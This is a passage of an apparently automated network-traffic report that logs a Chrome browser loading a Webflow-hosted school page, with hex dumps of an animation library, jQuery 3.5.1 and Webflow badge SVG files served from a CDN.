                                                  Data Ascii: cubic-bezier(0.645, 0.045, 0.355, 1)",function(t,e,n,i){return(t/=i/2)<1?n/2*t*t*t+e:n/2*((t-=2)*t*t+2)+e}],"ease-in-quart":["cubic-bezier(0.895, 0.030, 0.685, 0.220)",function(t,e,n,i){return n*(t/=i)*t*t*t+e}],"ease-out-quart":["cubic-bezier(0.165, 0.84
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 2d 31 30 2a 74 2f 69 29 2b 31 29 2b 65 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 6f 75 74 2d 65 78 70 6f 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 31 2c 20 30 2c 20 30 2c 20 31 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 3f 65 3a 74 3d 3d 3d 69 3f 65 2b 6e 3a 28 74 2f 3d 69 2f 32 29 3c 31 3f 6e 2f 32 2a 4d 61 74 68 2e 70 6f 77 28 32 2c 31 30 2a 28 74 2d 31 29 29 2b 65 3a 6e 2f 32 2a 28 2d 4d 61 74 68 2e 70 6f 77 28 32 2c 2d 31 30 2a 2d 2d 74 29 2b 32 29 2b 65 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 63 69 72 63 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 30 30 2c 20 30 2e 30 34 30 2c 20 30 2e 39 38 30 2c 20 30 2e 33 33 35 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72
                                                  Data Ascii: -10*t/i)+1)+e}],"ease-in-out-expo":["cubic-bezier(1, 0, 0, 1)",function(t,e,n,i){return 0===t?e:t===i?e+n:(t/=i/2)<1?n/2*Math.pow(2,10*(t-1))+e:n/2*(-Math.pow(2,-10*--t)+2)+e}],"ease-in-circ":["cubic-bezier(0.600, 0.040, 0.980, 0.335)",function(t,e,n,i){r
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 75 6e 69 74 6c 65 73 73 22 2c 45 3d 2f 28 61 6c 6c 7c 6e 6f 6e 65 29 20 30 73 20 65 61 73 65 20 30 73 2f 2c 5f 3d 2f 5e 28 77 69 64 74 68 7c 68 65 69 67 68 74 29 24 2f 2c 4c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 7a 3d 5b 22 57 65 62 6b 69 74 22 2c 22 4d 6f 7a 22 2c 22 4f 22 2c 22 6d 73 22 5d 2c 24 3d 5b 22 2d 77 65 62 6b 69 74 2d 22 2c 22 2d 6d 6f 7a 2d 22 2c 22 2d 6f 2d 22 2c 22 2d 6d 73 2d 22 5d 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 20 69 6e 20 4c 2e 73 74 79 6c 65 29 72 65 74 75 72 6e 7b 64 6f 6d 3a 74 2c 63 73 73 3a 74 7d 3b 76 61 72 20 65 2c 6e 2c 69 3d 22 22 2c 72 3d 74 2e 73 70 6c 69 74 28 22 2d 22 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 69 2b 3d
                                                  Data Ascii: unitless",E=/(all|none) 0s ease 0s/,_=/^(width|height)$/,L=document.createElement("a"),z=["Webkit","Moz","O","ms"],$=["-webkit-","-moz-","-o-","-ms-"],A=function(t){if(t in L.style)return{dom:t,css:t};var e,n,i="",r=t.split("-");for(e=0;e<r.length;e++)i+=
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 72 26 26 74 68 69 73 2e 74 69 6d 65 72 2e 64 65 73 74 72 6f 79 28 29 2c 74 68 69 73 2e 71 75 65 75 65 3d 5b 5d 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 21 31 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 61 26 26 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 74 69 6d 65 72 3d 6e 65 77 20 50 28 7b 64 75 72 61 74 69 6f 6e 3a 74 2c 63 6f 6e 74 65 78 74 3a 74 68 69 73 2c 63 6f 6d 70 6c 65 74 65 3a 72 7d 29 2c 76 6f 69 64 28 74 68 69 73 2e 61 63 74 69 76 65 3d 21 30 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 61 26 26 65 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 68 69 64 65 22 3a 75 2e 63 61 6c 6c 28 74 68 69 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 74 6f 70 22 3a 73 2e 63 61 6c 6c 28 74 68 69 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 65 64 72 61 77 22 3a 63
                                                  Data Ascii: r&&this.timer.destroy(),this.queue=[],this.active=!1),"number"==a&&e)return this.timer=new P({duration:t,context:this,complete:r}),void(this.active=!0);if("string"==a&&e){switch(t){case"hide":u.call(this);break;case"stop":s.call(this);break;case"redraw":c
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 2c 69 29 7b 76 61 72 20 72 2c 6f 2c 61 2c 73 2c 75 3d 65 21 3d 3d 68 2c 63 3d 7b 7d 3b 66 6f 72 28 72 20 69 6e 20 74 29 61 3d 74 5b 72 5d 2c 72 20 69 6e 20 59 3f 28 63 2e 74 72 61 6e 73 66 6f 72 6d 7c 7c 28 63 2e 74 72 61 6e 73 66 6f 72 6d 3d 7b 7d 29 2c 63 2e 74 72 61 6e 73 66 6f 72 6d 5b 72 5d 3d 61 29 3a 28 76 2e 74 65 73 74 28 72 29 26 26 28 72 3d 72 2e 72 65 70 6c 61 63 65 28 2f 5b 41 2d 5a 5d 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 2d 22 2b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 29 2c 72 20 69 6e 20 55 3f 63 5b 72 5d 3d 61 3a 28 73 7c 7c 28 73 3d 7b 7d 29 2c 73 5b 72 5d 3d 61 29 29 3b 66 6f 72 28 72 20 69 6e 20 63 29 7b 69 66 28 61 3d 63 5b 72 5d 2c 21 28 6f 3d 74 68 69 73 2e 70 72 6f 70 73 5b 72 5d 29 29 7b 69
                                                  Data Ascii: ,i){var r,o,a,s,u=e!==h,c={};for(r in t)a=t[r],r in Y?(c.transform||(c.transform={}),c.transform[r]=a):(v.test(r)&&(r=r.replace(/[A-Z]/g,function(t){return"-"+t.toLowerCase()})),r in U?c[r]=a:(s||(s={}),s[r]=a));for(r in c){if(a=c[r],!(o=this.props[r])){i
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 74 3d 22 62 6c 6f 63 6b 22 29 2c 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 74 7d 29 2c 77 28 22 68 69 64 65 22 2c 75 29 2c 77 28 22 72 65 64 72 61 77 22 2c 63 29 2c 77 28 22 64 65 73 74 72 6f 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 65 6c 2c 70 29 2c 74 68 69 73 2e 24 65 6c 3d 74 68 69 73 2e 65 6c 3d 6e 75 6c 6c 7d 29 7d 29 2c 43 3d 6c 28 46 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 6e 29 7b 76 61 72 20 69 3d 74 2e 64 61 74 61 28 65 2c 70 29 7c 7c 74 2e 64 61 74 61 28 65 2c 70 2c 6e 65 77 20 46 2e 42 61 72 65 29 3b 72 65 74 75 72 6e 20 69 2e 65 6c 7c 7c 69 2e 69 6e 69 74 28 65 29 2c 6e 3f 69 2e 73 74 61
                                                  Data Ascii: t="block"),this.el.style.display=t}),w("hide",u),w("redraw",c),w("destroy",function(){s.call(this),t.removeData(this.el,p),this.$el=this.el=null})}),C=l(F,function(e){function n(e,n){var i=t.data(e,p)||t.data(e,p,new F.Bare);return i.el||i.init(e),n?i.sta
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 61 75 74 6f 22 3d 3d 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 5b 74 68 69 73 2e 6e 61 6d 65 5d 26 26 28 74 68 69 73 2e 75 70 64 61 74 65 28 74 68 69 73 2e 67 65 74 28 29 29 2c 74 68 69 73 2e 72 65 64 72 61 77 28 29 29 2c 22 61 75 74 6f 22 3d 3d 74 26 26 28 74 3d 65 2e 63 61 6c 6c 28 74 68 69 73 29 29 29 2c 74 68 69 73 2e 6e 65 78 74 53 74 79 6c 65 3d 74 7d 2c 74 2e 66 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 5b 74 68 69 73 2e 6e 61 6d 65 5d 7c 7c 74 68 69 73 2e 63 6f 6e 76 65 72 74 28 74 68 69 73 2e 67 65 74 28 29 2c 74 68 69 73 2e 74 79 70 65 29 3b 74 3d 74 68 69 73 2e 63 6f 6e 76 65 72 74 28 74 2c 74 68 69 73 2e 74 79 70 65 29 2c 74 68 69 73 2e 61 75 74 6f 26 26 28 22 61 75 74 6f
                                                  Data Ascii: auto"==this.el.style[this.name]&&(this.update(this.get()),this.redraw()),"auto"==t&&(t=e.call(this))),this.nextStyle=t},t.fallback=function(t){var n=this.el.style[this.name]||this.convert(this.get(),this.type);t=this.convert(t,this.type),this.auto&&("auto
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 75 72 6e 20 74 2b 74 68 69 73 2e 61 6e 67 6c 65 3b 69 66 28 63 26 26 65 2e 74 65 73 74 28 74 29 29 72 65 74 75 72 6e 20 74 3b 73 3d 22 6e 75 6d 62 65 72 28 64 65 67 29 20 6f 72 20 73 74 72 69 6e 67 28 61 6e 67 6c 65 29 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 6b 3a 69 66 28 75 7c 7c 63 26 26 79 2e 74 65 73 74 28 74 29 29 72 65 74 75 72 6e 20 74 3b 73 3d 22 6e 75 6d 62 65 72 28 75 6e 69 74 6c 65 73 73 29 20 6f 72 20 73 74 72 69 6e 67 28 75 6e 69 74 20 6f 72 20 25 29 22 7d 72 65 74 75 72 6e 20 61 28 22 54 79 70 65 20 77 61 72 6e 69 6e 67 3a 20 45 78 70 65 63 74 65 64 3a 20 5b 22 2b 73 2b 22 5d 20 47 6f 74 3a 20 5b 22 2b 74 79 70 65 6f 66 28 6f 3d 74 29 2b 22 5d 20 22 2b 6f 29 2c 74 7d 2c 74 2e 72 65 64 72 61 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73
                                                  Data Ascii: urn t+this.angle;if(c&&e.test(t))return t;s="number(deg) or string(angle)";break;case k:if(u||c&&y.test(t))return t;s="number(unitless) or string(unit or %)"}return a("Type warning: Expected: ["+s+"] Got: ["+typeof(o=t)+"] "+o),t},t.redraw=function(){this


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.44973913.33.251.684435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:41 UTC674OUTGET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594 HTTP/1.1
                                                  Host: d3e54v103j8qbb.cloudfront.net
                                                  Connection: keep-alive
                                                  Origin: https://littlestownseniorhighschool.webflow.io
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:41 UTC617INHTTP/1.1 200 OK
                                                  Content-Type: application/javascript
                                                  Content-Length: 89476
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET
                                                  Access-Control-Max-Age: 3000
                                                  Last-Modified: Mon, 20 Jul 2020 17:53:02 GMT
                                                  Accept-Ranges: bytes
                                                  Server: AmazonS3
                                                  Date: Thu, 27 Mar 2025 21:21:56 GMT
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  Etag: "dc5e7f18c8d36ac1d3d4753a87c98d0a"
                                                  Via: 1.1 3bd704a723998d21cd3d1c7e5aa5b320.cloudfront.net (CloudFront)
                                                  Age: 55246
                                                  X-Cache: Hit from cloudfront
                                                  X-Amz-Cf-Pop: JFK50-P10
                                                  X-Amz-Cf-Id: fSdXKGVdgit_F2jMlaV4dybAHpSPu5NPI44aGRtVOp1AW857_Mfn8w==
                                                  2025-03-28 12:42:41 UTC15767INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                  Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                  2025-03-28 12:42:41 UTC16384INData Raw: 2d 34 29 2c 78 3d 22 6f 66 2d 74 79 70 65 22 3d 3d 3d 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 67 26 26 30 3d 3d 3d 76 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e
                                                  Data Ascii: -4),x="of-type"===e;return 1===g&&0===v?function(e){return!!e.parentNode}:function(e,t,n){var r,i,o,a,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeN
                                                  2025-03-28 12:42:41 UTC16384INData Raw: 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 45 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 53 2e 72 65 61 64 79 29 3a 28 45 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 42 29 2c 43 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6c 3d 6e 75 6c 6c 3d 3d 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 77 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e
                                                  Data Ascii: E.readyState||"loading"!==E.readyState&&!E.documentElement.doScroll?C.setTimeout(S.ready):(E.addEventListener("DOMContentLoaded",B),C.addEventListener("load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===w(n))for(s in i=!0,n
                                                  2025-03-28 12:42:41 UTC16384INData Raw: 2e 5f 65 76 61 6c 55 72 6c 26 26 21 75 2e 6e 6f 4d 6f 64 75 6c 65 26 26 53 2e 5f 65 76 61 6c 55 72 6c 28 75 2e 73 72 63 2c 7b 6e 6f 6e 63 65 3a 75 2e 6e 6f 6e 63 65 7c 7c 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7d 2c 6c 29 3a 62 28 75 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 72 65 70 6c 61 63 65 28 6a 65 2c 22 22 29 2c 75 2c 6c 29 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 53 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 63 6c 65 61 6e 44 61 74 61 28 76 65 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26
                                                  Data Ascii: ._evalUrl&&!u.noModule&&S._evalUrl(u.src,{nonce:u.nonce||u.getAttribute("nonce")},l):b(u.textContent.replace(je,""),u,l))}return n}function Re(e,t,n){for(var r,i=t?S.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||S.cleanData(ve(r)),r.parentNode&&
                                                  2025-03-28 12:42:41 UTC16384INData Raw: 74 3a 32 30 30 2c 5f 64 65 66 61 75 6c 74 3a 34 30 30 7d 2c 53 2e 66 6e 2e 64 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 29 7b 72 65 74 75 72 6e 20 72 3d 53 2e 66 78 26 26 53 2e 66 78 2e 73 70 65 65 64 73 5b 72 5d 7c 7c 72 2c 65 3d 65 7c 7c 22 66 78 22 2c 74 68 69 73 2e 71 75 65 75 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 69 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74
                                                  Data Ascii: t:200,_default:400},S.fn.delay=function(r,e){return r=S.fx&&S.fx.speeds[r]||r,e=e||"fx",this.queue(e,function(e,t){var n=C.setTimeout(e,r);t.stop=function(){C.clearTimeout(n)}})},rt=E.createElement("input"),it=E.createElement("select").appendChild(E.creat
                                                  2025-03-28 12:42:41 UTC8173INData Raw: 20 74 68 69 73 2e 70 61 72 65 6e 74 28 65 29 2e 6e 6f 74 28 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65
                                                  Data Ascii: this.parent(e).not("body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().le


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.44974013.33.251.684435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:42 UTC692OUTGET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1
                                                  Host: d3e54v103j8qbb.cloudfront.net
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Sec-Fetch-Storage-Access: active
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:42 UTC579INHTTP/1.1 200 OK
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 421
                                                  Connection: close
                                                  Last-Modified: Thu, 21 Sep 2023 16:04:04 GMT
                                                  X-Amz-Server-Side-Encryption: AES256
                                                  Accept-Ranges: bytes
                                                  Server: AmazonS3
                                                  Date: Fri, 28 Mar 2025 02:50:09 GMT
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  Etag: "89e12c322e66c81213861fc9acb8b003"
                                                  Via: 1.1 2ae108ea5404064fac59010eedcd1806.cloudfront.net (CloudFront)
                                                  Age: 35554
                                                  Access-Control-Allow-Origin: *
                                                  X-Cache: Hit from cloudfront
                                                  X-Amz-Cf-Pop: JFK50-P10
                                                  X-Amz-Cf-Id: WI55YFzr3jcVAaqlH27a1voGLX5wiajeumi6vLvYv8YS4Xft9KJrSw==
                                                  2025-03-28 12:42:42 UTC421INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 36 20 31 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 35 2e 36 35 20 30 4c 31 37 2e 34 36 35 34 20 31 36 48 39 2e 37 37 37 37 38 4c 31 33 2e 32 30 33 20 39 2e 33 36 38 39 32 48 31 33 2e 30 34 39 33 43 31 30 2e 32 32 33 35 20 31 33 2e 30 33 37 32 20 36 2e 30 30 37 33 38 20 31 35 2e 34 35 32 20 30 20 31 36 56 39 2e 34 36 30 36 38 43 30 20 39 2e 34 36 30 36 38 20 33 2e 38 34 33
                                                  Data Ascii: <svg width="26" height="16" viewBox="0 0 26 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M25.65 0L17.4654 16H9.77778L13.203 9.36892H13.0493C10.2235 13.0372 6.00738 15.452 0 16V9.46068C0 9.46068 3.843


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.44974113.33.251.684435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:42 UTC692OUTGET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1
                                                  Host: d3e54v103j8qbb.cloudfront.net
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Sec-Fetch-Storage-Access: active
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:42 UTC580INHTTP/1.1 200 OK
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 9912
                                                  Connection: close
                                                  Date: Thu, 27 Mar 2025 20:17:35 GMT
                                                  Last-Modified: Thu, 21 Sep 2023 16:04:31 GMT
                                                  Etag: "c82cec3b78a2b2d267bbfe3c7e838068"
                                                  X-Amz-Server-Side-Encryption: AES256
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  Accept-Ranges: bytes
                                                  Server: AmazonS3
                                                  Via: 1.1 73a725fa02f9ec8c532ae0d445890568.cloudfront.net (CloudFront)
                                                  Age: 59108
                                                  Access-Control-Allow-Origin: *
                                                  X-Cache: Hit from cloudfront
                                                  X-Amz-Cf-Pop: JFK50-P10
                                                  X-Amz-Cf-Id: DnDimFaL_rMXRFpGvkefprV1SFavk8VuHzVafDRAj4I0DVgNnPbaLQ==
                                                  2025-03-28 12:42:42 UTC9912INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 31 38 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 38 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 30 2e 35 32 35 30 32 34 20 30 2e 38 39 36 34 38 34 48 33 2e 30 35 34 33 32 4c 36 2e 30 30 37 37 36 20 38 2e 32 36 36 32 32 4c 38 2e 38 39 39 30 35 20 30 2e 38 39 36 34 38 34 48 31 31 2e 33 35 33 31 56 31 31 48 39 2e 34 37 33 32 37 56 33 2e 37 39 39 34 39 4c 36 2e 36 36 33 37 20 31 31 48 35 2e 31 38 37 31 33 4c 32 2e 33 38 34 34 20 33 2e 39 32 30 37 37 56 31 31 48 30 2e 35 32 35 30 32 34 56 30 2e 38 39 36 34 38 34 5a 22 20 66 69 6c 6c 3d
                                                  Data Ascii: <svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449742104.18.160.1174435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
